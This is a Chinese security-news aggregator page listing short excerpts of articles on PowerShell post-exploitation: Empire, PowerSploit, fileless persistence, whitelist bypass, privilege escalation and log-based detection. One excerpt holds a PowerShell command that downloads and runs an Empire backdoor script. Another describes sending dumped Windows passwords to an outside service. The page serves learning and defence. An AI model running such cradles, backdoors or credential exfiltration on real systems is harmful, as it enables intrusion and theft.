记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

powershell渗透利用(入门)

Powershell简介PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且powershell存在于诸多系统中。Powershell编写脚本很多人不太了解powershell,包括它内置了很多的命令,假如你想写一个powershell脚本,那么可以通过定义函数,然后调用这些命令(因为本人有点小菜,所以就想到一个小小的方法,那就是用后面介绍的ise)。我们可以通过Get-Command命令 。Get-Command使您可以一次显示所有可用的PowerShell命令。          &nb
发布时间:2019-02-26 12:20 | 阅读:51249 | 评论:0 | 标签:技术 Powershell

如何从PowerShell内存转储中提取执行的脚本内容

前言在我们分析了如何从PowerShell进程转储中提取活动历史记录后,又产生了一个有意思的后续问题:“是否可以提取已经执行的脚本内容(来自磁盘),即使这些文件未被捕获?”答案是肯定的,但这一过程也非常复杂。为了详细讲解这一方法,我们将从侦查开始起步。在我们的研究过程中,很多地方都需要WinDbg协助完成自动化操作,因此我们的第一步就是安装WinDbg模块。要部署我们的实验环境,我们编写了这个简单的脚本,并将其保存在类似于C:temp的位置:打开PowerShell会话,运行脚本,然后创建转储文件。现在,使用WinDbg模块连接到转储文件:Connect-DbgSession -ArgumentList&nb
发布时间:2019-02-01 17:20 | 阅读:100978 | 评论:0 | 标签:技术 Powershell

PowerShell无文件持久化技术与常用的防御绕过技术

目前为止,PowerShell仍然是网络安全专家进行防御和黑客进行攻击的首选工具。原因很简单,PowerShell具有很好的可扩展性,支持能力以及适应各种编程语言。如PowerShell Empire,PowerSploit等,都被安全研究人员以及黑客所使用。这两天,就有安全平台检测出了有恶意软件利用PowerShell所进行的攻击,该攻击可以进行持久性攻击并绕过传统安全防护的检测。恶意软件会诱骗用户对网站上的Adobe Flash浏览器插件进行更新,然后使用一个称为mshta.exe的HTA攻击方法。 MSHTA.exe是一个合法的Microsoft二进制文件,可以在任何浏览器中被调用,用于执行.HTA文件。不过在大
发布时间:2019-01-15 12:20 | 阅读:64369 | 评论:0 | 标签:Web安全 Powershell

使用Empire进行黑客攻击——Empire初级指南

大家好,今天本文为大家准备的是Empire的初级指南。据官网介绍“Empire是纯PowerShell后渗透利用代理”,建立在加密的安全通信和灵活的架构之上。Empire—PowerShell后渗透利用代理Empire实现了无需powershell.exe就可以运行powershell代理的能力,可快速部署后渗透利用模块,从键盘记录器到mimikatz,还有自适应良好的通信机制来绕过网络监测,这些功能都集成在注重实用性的框架上。本教程中,我们会讲解该软件所有你需要了解的知识点,从安装到getshell,甚至是在av毫无察觉的情况下获取admin访问权限。在开始之前,你需要了解下面这4个概念。· Listener:·&n
发布时间:2018-10-29 12:20 | 阅读:67685 | 评论:0 | 标签:技术 Empire Powershell

Powershell入门必备(四)

介绍随着我们这个系列文章的逐步深入,我们就越能发现powershell的强大之处,而这种强大只会越来越明显。在本篇文章中,我们会探索如何使用powershell来操作模块。这对我们来说是学习PowerShell的一个非常有趣和重要的部分,因为它在许多任务和操作的自动化方面将会为我们提供许多帮助。使用powershell模块正如我们在前面的文章中看到的,模块是PowerShell里一个非常强大的概念。现在我们会来学习在渗透测试中如何创建和利用它们,特别是用于自动化日常任务。首先,让我们记住模块的定义。Microsoft对模块的描述定义是这样的:· “模块是包含PowerShell命令的包,例如cmdlets,提供程序,函
发布时间:2018-10-08 12:20 | 阅读:99237 | 评论:0 | 标签:内网渗透 安全工具 Powershell

渗透测试神器powershell入门必备(三)–函数和脚本

介绍随着我们本系列文章的逐步深入,我们便会更加明白powershell的强大之处,本文我们就来讲解一些powershell的函数和脚本。Powershell函数基于前两篇文章的介绍,相信大家对powershell有了基本的了解,函数的用法其实也非常简单,只要使用下面的语法即可:function [<scope:>]<name> [([type]$parameter1[,[type]$parameter2])]{param([type]$parameter1 [,[type]$parameter2]) dynamicparam {<state
发布时间:2018-09-11 12:20 | 阅读:78594 | 评论:0 | 标签:系统安全 functions Powershell scripting

如何利用日志来监控和限制PowerShell攻击活动

写在前面的话 近期,我一直在我客户的网络环境中分析PowerShell攻击,根据我的分析以及研究结果,我发现了几种方法来帮助研究人员检测潜在的PowerShell攻击。这种方法主要利用的是Windows的事件日志,首先我们需要了解攻击者是如何使用PowerShell来实施攻击的,然后我们再来看一看相关的检测和防御机制。 PowerShell如何被用于网络攻击之中 PowerShell的能力大家有目共睹,近期也有越来越多的攻击者开始在攻击活动中使用PowerShell了。PowerShell是Windows操作系统自带的工具,因此目标Windows用户的主机中自然也就包含了这种工具。 在我们所观察到的攻击活动中,PowerShell一般会被攻击者用来下载恶意文件。攻击者可以利用PowerShell将远
发布时间:2017-12-09 16:35 | 阅读:103786 | 评论:0 | 标签:系统安全 powershell 日志监控

无文件攻击有多阴险 竟利用“永恒之蓝”传播挖矿机

网络罪犯不需要在你的系统里放上恶意软件就能侵入。无文件/零足迹攻击能够利用合法应用,甚至利用操作系统本身,亦或逃过白名单的检测机制,利用位于批准列表之上且已经安装到机器上的应用,进行攻击。不过,“无文件”、“零足迹”和“非恶意软件”这几个术语,从技术上讲都属于用词不准确的范畴,因为它们往往依赖用户下载恶意附件文件的行为,且确实在计算机上留下了踪迹——只要你知道该找寻什么。实际上,完全零足迹的恶意软件并不存在,因为有很多方法都可以检测出恶意软件——即便恶意软件不把自身安装到硬盘上。而且,它们并不能完全绕过反病毒工具。因为即使不安装可执行程序,反病毒工具还是可以发现恶意附件或恶意链接。只是利用无文件攻击的话,侵入系统的几率会高,这才是真正的威胁所在。无文件恶意软件是越来越大的威胁高级威胁防护厂商Carbon Bla
发布时间:2017-09-28 03:40 | 阅读:101619 | 评论:0 | 标签:行业动态 powershell 恶意软件 挖矿机 无文件攻击 蜜罐

PSAttack:一个包含所有的渗透测试用例的攻击型Powershell脚本框架

目前网上有很多PowerShell攻击工具,比如说著名的Windows日志杀手Invoke-Phant0m。而本文所要介绍的是一款名叫PSAttack的框架,该框架中包含有几乎所有的PowerShell攻击脚本,各位同学在进行渗透测试的过程中肯定会用到它们。 PSAttack下载地址 【PSAttackv1.9】 PSAttack介绍 PSAttack是一款开源的PowerShell脚本框架,其中包含有目前安全社区中多款最优秀的项目。最有趣的地方就在于,这个攻击性PowerShell框架并不依赖于powershell.exe,用户可以直接通过.NET框架来调用PowerShell,这就使得企业环境更加难以阻止这个脚本框架的运行了。其次,该框架中包含的模块都经过了加密处理,而且不会在磁盘上存储,当我们在
发布时间:2017-07-14 18:10 | 阅读:126982 | 评论:0 | 标签:工具 powershell ps attack

如何使用Regsvr32通过应用程序白名单

我最近的一个客户,其红队防御十分先进。该客户有严格的出口管制、边界代理、强观测及极为严格的应用程序白名单控制。我和队友都明白我们得十分卖命地从这个环境中取得命令控制,而那会是在取得物理访问之后(另一项挑战)。 进入场地前一周,我们便开始研究所有可能的应用程序白名单的通过方法。我们假定了最佳防御方案,即除特定经允许的应用外,客户封锁了所有的二进制执行进行。在与其他客户及该客户之前的测试中,我们曾使用过“rundll32. exe”来执行DLL内容。如你可以在DLL(动态链接库)中host溢出检测,并有好的入口点,那这种方法着实有用。在渗透测试指南的案例中,DLL入口点名为“Control_RunDLL”,而这可能会在白名单之外,而且我们也了解这个把戏已经用过,也不抱有过多期望了。 Casey Smith曾发表过一
发布时间:2017-06-08 21:25 | 阅读:140494 | 评论:0 | 标签:技术控 powershell regsvr32 shellcode

AD ACL Scanner:一款扫描活动目录权限并自动生成报告的小工具

今天给大家介绍的是一款基于PowerShell的GUI工具,这款免费工具可以帮助我们生成HTML或CSV格式的活动目录权限报告。 工具下载 【下载地址一】 【下载地址二】 工具介绍 这款活动目录(Active Directory-AD)权限分析器的开发者为Robin Granberg(就职于微软公司),你可以从下面这张截图中看到,你根本不会注意到AD ACL Scanner是基于PowerShell开发出来的。不仅如此,你在使用它的过程中也不需要任何的PowerShell技术。但是,如果你想进行高级活动目录权限分析的话,还需要使用到PowerShell脚本,而此时就可能需要你自行编写PowerShell代码了。 除了扫描活动目录权限之外,AD ACL Scanner还可以帮助我们设置目录权限。但是,如果你想
发布时间:2017-05-19 12:15 | 阅读:144622 | 评论:0 | 标签:工具 powershell 扫描

如何创建Powershell持久隐蔽后门

*本文原创作者:al0ne_,本文属FreeBuf原创奖励计划,未经许可禁止转载 用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。 1.安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本 powershell-nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/m
发布时间:2017-05-08 21:35 | 阅读:145482 | 评论:0 | 标签:系统安全 网络安全 powershell 后门

在msf和powershell中利用hotpotato进行提权

通过类似SMB协议的NTLM认证已经被微软修补了,不过HTTP到SMB正在使用这种验证,并且还用于创建高权限服务中。因为流量包中含有NTLM凭据并且正在通过伪代理服务器,因此可以将其捕获并传递到本地SMB侦听器,作为SYSTEM权限执行任何命令。Stephen Breen在他的博客(https://foxglovesecurity.com/2016/01/16/hot-potato/)中描述了这次攻击的所有阶段。这次攻击适用的平台:Windows7Windows8Windows10Windows Server 2008Windows Server 2012在命令行下进行权限提升Stephen Breen开发了一个可执行文件,可以自动执行这些攻击,并可以在目标系统上执行任何
发布时间:2017-04-18 23:35 | 阅读:161371 | 评论:0 | 标签:技术 系统安全 Powershell 提权

说说Powersploit在内网渗透中的使用

先说: 第一次写,大家轻点喷,扫扫盲… 内网环境下,我们用metasploit生成一个payload,万一运气稍微好点的,碰到了像360这些东西,我等小白是一脸懵的,这种情况下,就可以想powershell,总不会杀软连这个都要杀吧。 总之powershell + metasploit,双剑合璧,对我们来说在内网渗透中对我们还是有很大的帮助的,可以说是一个巨大的隐藏宝藏! 进入正题 一.Powershell 我们先来说说powershell,PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。你可以把它看成是命令行提示符 cmd.exe 的扩充,或是颠覆。Powershell需要.NET环境的支持,同时支持.NET对象。其可读性,易用性,可以位居当前所有
发布时间:2017-04-14 00:45 | 阅读:212700 | 评论:0 | 标签:工具 网络安全 Metasploit powershell

Metasploit、powershell之Windows错误系统配置漏洞实战提权

*原创作者:shuteer,本文属FreeBuf原创奖励计划,未经许可禁止转载 0×01 引言 我们在获得目标机一个普通的权限时,除了常规提权方法外,还可以通过查找目标主机错误的系统配置和漏洞来获取系统权限。本节所讲的“Trusted Service Paths(可信任服务路径)漏洞”和“系统服务的错误权限配置漏洞”绝对是你值得尝试的一个环节。 0×02 Trusted Service Paths(可信任服务路径)漏洞介绍 “Trusted Service Paths”漏洞是由系统中的“CreateProcess”函数引起的,利用了windows文件路径解析的特性,并涉及了服务路径的文件/文件夹权限,存在缺陷的服务程序利用了属于可执行文件的文件/文件夹权限。如果权限合适,我们可以上传恶意可执行文件。简
发布时间:2017-04-11 22:15 | 阅读:139792 | 评论:0 | 标签:系统安全 Metasploit powershell Windows提权 Windows错误系统配置漏洞 提权 漏洞

利用Powershell和ceye.io实现Windows账户密码回传

最近在研究Powershell的使用,之前我一直不习惯Windows的主要原因是他那孱弱的命令行工具,稍微了解了Powershell之后差点跪下了,真的是一款非常了不起的工具。powershell的定义是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。简单的理解就是像linux下的bash。powershell有着诸多的优点,但是仅凭无文件和操作系统自带这两大优点基本上确定了他的地位。mimikatz是一款黑客后渗透(不是提权)神器,其中一个功能是在管理员账户下获取Windows明文密码,现在也有powershell版本了。我想测试的流程就是通过powershell获取Windows信息之后提取关键的用户名和密码,将用户名和密码转码之后访问ceye.io,
发布时间:2017-03-14 19:10 | 阅读:127954 | 评论:0 | 标签:系统安全 powershell 账户密码回传

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云